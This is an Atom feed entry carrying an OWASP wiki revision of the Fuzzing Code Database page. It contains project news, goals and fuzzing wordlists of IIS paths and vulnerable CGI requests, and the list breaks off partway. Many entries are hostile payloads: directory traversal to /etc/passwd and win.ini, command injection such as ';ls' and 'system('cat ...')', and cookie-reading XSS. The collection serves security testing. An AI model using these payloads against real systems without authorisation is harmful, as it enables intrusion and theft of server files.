<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
		<id>https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Adam.muntner</id>
		<title>OWASP - User contributions [en]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Adam.muntner"/>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php/Special:Contributions/Adam.muntner"/>
		<updated>2026-04-30T17:53:35Z</updated>
		<subtitle>User contributions</subtitle>
		<generator>MediaWiki 1.27.2</generator>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=81248</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=81248"/>
				<updated>2010-04-12T17:55:24Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''17 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563)&lt;br /&gt;
*Created new Category: Windows Directory Traversal (Update: 17 March 2010 - Total Statements: 16)&lt;br /&gt;
*Created new Category: Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879)&lt;br /&gt;
*Created new Category: Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)&lt;br /&gt;
*Created new Category: File Upload Filter Bypass (Update: 17 March 2010 - Total Statements: 4)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)&lt;br /&gt;
*Created new Category: Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)&lt;br /&gt;
*Created new Category: Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)&lt;br /&gt;
&lt;br /&gt;
'''16 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)&lt;br /&gt;
*Created new Category: Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) &lt;br /&gt;
*Created new Category: Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
*Created new Category: All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2010 - Total Statements: 31)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Microsoft URLs (8 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Interesting IIS Files &amp;amp; Directories (8 April 2010)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
# Look at the result codes in the headers - 403 likely mean the dir exists, 404  means not. It takes an ISAPI filter for IIS to return 404's for 403s. &lt;br /&gt;
# Altetrnatively, slight differences in the number of bytes returned will help differentiate.&lt;br /&gt;
&lt;br /&gt;
/.printer&lt;br /&gt;
/%NETHOOD%/&lt;br /&gt;
/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.aspx&lt;br /&gt;
/AccessPlatform/&lt;br /&gt;
/AccessPlatform/auth/&lt;br /&gt;
/AccessPlatform/auth/clientscripts/cookies.js &lt;br /&gt;
/AccessPlatform/auth/clientscripts/login.js &lt;br /&gt;
/Exadmin/&lt;br /&gt;
/ExchWeb/&lt;br /&gt;
/Exchange/&lt;br /&gt;
/Microsoft-Server-ActiveSync/&lt;br /&gt;
/OMA/&lt;br /&gt;
/OWA/&lt;br /&gt;
/Public/&lt;br /&gt;
/_layouts/alllibs.htm&lt;br /&gt;
/_layouts/settings.htm&lt;br /&gt;
/_layouts/userinfo.htm&lt;br /&gt;
/_vti_bin/&lt;br /&gt;
/_vti_bin/_vti_aut/fp30reg.dll&lt;br /&gt;
/_vti_pvt/&lt;br /&gt;
/_WEB_INF/&lt;br /&gt;
/a%5c.aspx&lt;br /&gt;
/adovbs.inc&lt;br /&gt;
/aspnet_files/&lt;br /&gt;
/certcontrol/&lt;br /&gt;
/certenroll/&lt;br /&gt;
/certsrv/&lt;br /&gt;
/citrix/&lt;br /&gt;
/citrix/AccessPlatform/auth/&lt;br /&gt;
/citrix/AccessPlatform/auth/clientscripts/&lt;br /&gt;
/AccessPlatform/auth/clientscripts/&lt;br /&gt;
/Citrix//AccessPlatform/auth/clientscripts/cookies.js &lt;br /&gt;
/Citrix/AccessPlatform/auth/clientscripts/login.js &lt;br /&gt;
/Citrix/PNAgent/config.xml&lt;br /&gt;
/exchange/root.asp&lt;br /&gt;
/forum.asp&lt;br /&gt;
/forum_arc.asp&lt;br /&gt;
/forum_professionnel.asp&lt;br /&gt;
/iisadmin/&lt;br /&gt;
/iisadmpwd/achg.htr&lt;br /&gt;
/iisadmpwd/aexp.htr&lt;br /&gt;
/iisadmpwd/aexp2.htr&lt;br /&gt;
/iisadmpwd/aexp2b.htr&lt;br /&gt;
/iisadmpwd/aexp3.htr&lt;br /&gt;
/iisadmpwd/aexp4.htr&lt;br /&gt;
/iisadmpwd/aexp4b.htr&lt;br /&gt;
/iisadmpwd/anot.htr&lt;br /&gt;
/iisadmpwd/anot3.htr&lt;br /&gt;
/iiasdmpwd/&lt;br /&gt;
/iishelp/&lt;br /&gt;
/iishelp/iis/misc/default.asp&lt;br /&gt;
/iissamples/&lt;br /&gt;
/imprimer.asp&lt;br /&gt;
/includes/adovbs.inc&lt;br /&gt;
/msadc/&lt;br /&gt;
/null.htw&lt;br /&gt;
/pbserver/pbserver.dll&lt;br /&gt;
/postinfo.html&lt;br /&gt;
/rubrique.asp&lt;br /&gt;
/scripts/&lt;br /&gt;
/scripts/fpcount.exe&lt;br /&gt;
/scripts/cgimail.exe&lt;br /&gt;
/scripts/tools/newdsn.exe&lt;br /&gt;
/scripts/tools/getdrvs.exe&lt;br /&gt;
/scripts/convert.bas&lt;br /&gt;
/cgi-bin/htmlscript&lt;br /&gt;
/scripts/counter.exe&lt;br /&gt;
/scripts/no-such-file.pl&lt;br /&gt;
/share/&lt;br /&gt;
/tsweb/&lt;br /&gt;
/~/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.asp&lt;br /&gt;
/~/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.aspx&lt;br /&gt;
/index.shtml&lt;br /&gt;
/x.htw&lt;br /&gt;
/x.ida&lt;br /&gt;
/x.idq&lt;br /&gt;
/cgi&lt;br /&gt;
/scripts/iisadmin/ism.dll?http/dir&lt;br /&gt;
/scripts/samples/search/webhits.exe&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (17 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
clickresponder.pl&lt;br /&gt;
code.php&lt;br /&gt;
code.php3&lt;br /&gt;
com5..........................................................................................................................................................................................................................box&lt;br /&gt;
com5.java&lt;br /&gt;
com5.pl&lt;br /&gt;
commandit.cgi&lt;br /&gt;
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html&lt;br /&gt;
common.php?f=0&amp;amp;ForumLang=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
common/listrec.pl&lt;br /&gt;
common/listrec.pl?APP=qmh-news&amp;amp;TEMPLATE=;ls%20/etc|&lt;br /&gt;
compatible.cgi&lt;br /&gt;
count.cgi&lt;br /&gt;
counter-ord&lt;br /&gt;
counterbanner&lt;br /&gt;
counterbanner-ord&lt;br /&gt;
counterfiglet-ord&lt;br /&gt;
counterfiglet/nc/&lt;br /&gt;
cs&lt;br /&gt;
csChatRBox.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csGuestBook.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csLive&lt;br /&gt;
csNews.cgi&lt;br /&gt;
csNewsPro.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csPassword.cgi&lt;br /&gt;
csPassword/csPassword.cgi&lt;br /&gt;
csh&lt;br /&gt;
cstat.pl&lt;br /&gt;
cutecast/members/&lt;br /&gt;
cvsblame.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=*&amp;amp;rev=&amp;amp;root=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?branch=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;date=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=&amp;amp;dir=&amp;amp;file=&amp;amp;who=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;sortby=Date&amp;amp;hours=2&amp;amp;date=week&lt;br /&gt;
cvsqueryform.cgi?cvsroot=/cvsroot&amp;amp;module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=HEAD&lt;br /&gt;
dansguardian.pl?DENIEDURL=&amp;lt;/a&amp;gt;&amp;lt;script&amp;gt;alert('XSS');&amp;lt;/script&amp;gt;&lt;br /&gt;
dasp/fm_shell.asp&lt;br /&gt;
data/fetch.php?page=&lt;br /&gt;
date&lt;br /&gt;
day5datacopier.cgi&lt;br /&gt;
day5datanotifier.cgi&lt;br /&gt;
db2www/library/document.d2w/show&lt;br /&gt;
db4web_c/dbdirname/{KNOWNFILE}&lt;br /&gt;
db_manager.cgi&lt;br /&gt;
dbman/db.cgi?db=no-db&lt;br /&gt;
dcforum.cgi?az=list&amp;amp;forum=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
dcshop/auth_data/auth_user_file.txt&lt;br /&gt;
dcshop/orders/orders.txt&lt;br /&gt;
dfire.cgi&lt;br /&gt;
diagnose.cgi&lt;br /&gt;
dig.cgi&lt;br /&gt;
directorypro.cgi?want=showcat&amp;amp;show=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
displayTC.pl&lt;br /&gt;
dnewsweb&lt;br /&gt;
donothing&lt;br /&gt;
dose.pl?daily&amp;amp;somefile.txt&amp;amp;|ls|&lt;br /&gt;
download.cgi&lt;br /&gt;
dumpenv.pl&lt;br /&gt;
edit.pl&lt;br /&gt;
empower?DB=whateverwhatever&lt;br /&gt;
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
enter.cgi&lt;br /&gt;
environ.cgi&lt;br /&gt;
environ.pl&lt;br /&gt;
environ.pl?param1=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
eshop.pl/seite=;cat%20eshop.pl|&lt;br /&gt;
ex-logger.pl&lt;br /&gt;
excite&lt;br /&gt;
excite;IF&lt;br /&gt;
ezadmin.cgi&lt;br /&gt;
ezboard.cgi&lt;br /&gt;
ezman.cgi&lt;br /&gt;
ezshopper/loadpage.cgi?user_id=1&amp;amp;file=|cat%20{KNOWNFILE}|&lt;br /&gt;
ezshopper/search.cgi?user_id=id&amp;amp;database=dbase1.exm&amp;amp;template=../../../../../../..{KNOWNFILE}&amp;amp;distinct=1&lt;br /&gt;
ezshopper2/loadpage.cgi&lt;br /&gt;
ezshopper3/loadpage.cgi&lt;br /&gt;
faqmanager.cgi?toc={KNOWNFILE}%00&lt;br /&gt;
faxsurvey?cat%20{KNOWNFILE}&lt;br /&gt;
filemail&lt;br /&gt;
filemail.pl&lt;br /&gt;
finger&lt;br /&gt;
finger.pl&lt;br /&gt;
flexform&lt;br /&gt;
flexform.cgi&lt;br /&gt;
fom.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
fom/fom.cgi?cmd=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=1&amp;amp;keywords=vulnerable&lt;br /&gt;
formmail&lt;br /&gt;
formmail.cgi&lt;br /&gt;
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail.pl&lt;br /&gt;
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
fortune&lt;br /&gt;
ftp.pl&lt;br /&gt;
ftpsh&lt;br /&gt;
gH.cgi&lt;br /&gt;
gbadmin.cgi?action=change_adminpass&lt;br /&gt;
gbadmin.cgi?action=change_automail&lt;br /&gt;
gbadmin.cgi?action=colors&lt;br /&gt;
gbadmin.cgi?action=setup&lt;br /&gt;
gbook/gbook.cgi?_MAILTO=xx;ls&lt;br /&gt;
gbpass.pl&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1&lt;br /&gt;
getdoc.cgi&lt;br /&gt;
gettransbitmap&lt;br /&gt;
glimpse&lt;br /&gt;
gm-authors.cgi&lt;br /&gt;
gm-cplog.cgi&lt;br /&gt;
gm.cgi&lt;br /&gt;
guestbook.cgi&lt;br /&gt;
guestbook.cgi?user=cpanel&amp;amp;template=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
guestbook.pl&lt;br /&gt;
guestbook/passwd&lt;br /&gt;
handler.cgi&lt;br /&gt;
hitview.cgi&lt;br /&gt;
horde/test.php&lt;br /&gt;
horde/test.php?mode=phpinfo&lt;br /&gt;
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
htgrep?file=index.html&amp;amp;hdr={KNOWNFILE}&lt;br /&gt;
html2chtml.cgi&lt;br /&gt;
html2wml.cgi&lt;br /&gt;
htmlscript?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E&lt;br /&gt;
htsearch?-c/nonexistant&lt;br /&gt;
htsearch?config=foofighter&amp;amp;restrict=&amp;amp;exclude=&amp;amp;method=and&amp;amp;format=builtin-long&amp;amp;sort=score&amp;amp;words=&lt;br /&gt;
htsearch?exclude=%60{KNOWNFILE}%60&lt;br /&gt;
ibill.pm&lt;br /&gt;
icat&lt;br /&gt;
if/admin/nph-build.cgi&lt;br /&gt;
ikonboard/help.cgi?&lt;br /&gt;
imageFolio.cgi&lt;br /&gt;
imagefolio/admin/admin.cgi&lt;br /&gt;
imagemap&lt;br /&gt;
include/new-visitor.inc.php&lt;br /&gt;
index.js0x70&lt;br /&gt;
index.pl&lt;br /&gt;
info2www&lt;br /&gt;
info2www '(../../../../../../../bin/mail root &amp;lt;{KNOWNFILE}&amp;gt;&lt;br /&gt;
infosrch.cgi&lt;br /&gt;
ion-p?page=../../../../..{KNOWNFILE}&lt;br /&gt;
jailshell&lt;br /&gt;
jj&lt;br /&gt;
journal.cgi?folder=journal.cgi%00&lt;br /&gt;
ksh&lt;br /&gt;
lastlines.cgi?process&lt;br /&gt;
listrec.pl&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
log-reader.cgi&lt;br /&gt;
log/&lt;br /&gt;
log/nether-log.pl?checkit&lt;br /&gt;
login.cgi&lt;br /&gt;
login.pl&lt;br /&gt;
login.pl?course_id=\&lt;br /&gt;
logit.cgi&lt;br /&gt;
logs.pl&lt;br /&gt;
logs/&lt;br /&gt;
logs/access_log&lt;br /&gt;
logs/error_log&lt;br /&gt;
lookwho.cgi&lt;br /&gt;
ls&lt;br /&gt;
lwgate&lt;br /&gt;
lwgate.cgi&lt;br /&gt;
magiccard.cgi?pa=3Dpreview&amp;amp;amp;next=3Dcustom&amp;amp;amp;page=3D../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mail&lt;br /&gt;
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mail/nph-mr.cgi?do=loginhelp&amp;amp;configLanguage=../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mailit.pl&lt;br /&gt;
maillist.cgi&lt;br /&gt;
maillist.pl&lt;br /&gt;
mailnews.cgi&lt;br /&gt;
main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
majordomo.pl&lt;br /&gt;
man2html&lt;br /&gt;
mastergate/search.cgi?search=0&amp;amp;search_on=all&lt;br /&gt;
meta.pl&lt;br /&gt;
mgrqcgi&lt;br /&gt;
mini_logger.cgi&lt;br /&gt;
mmstdod.cgi&lt;br /&gt;
moin.cgi?test&lt;br /&gt;
mojo/mojo.cgi&lt;br /&gt;
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=blah&lt;br /&gt;
ms_proxy_auth_query/&lt;br /&gt;
mt-static/&lt;br /&gt;
mt-static/mt-check.cgi&lt;br /&gt;
mt-static/mt-load.cgi&lt;br /&gt;
mt-static/mt.cfg&lt;br /&gt;
mt/&lt;br /&gt;
mt/mt-check.cgi&lt;br /&gt;
mt/mt-load.cgi&lt;br /&gt;
mt/mt.cfg&lt;br /&gt;
multihtml.pl?multi={KNOWNFILE}%00html&lt;br /&gt;
musicqueue.cgi&lt;br /&gt;
myguestbook.cgi?action=view&lt;br /&gt;
namazu.cgi&lt;br /&gt;
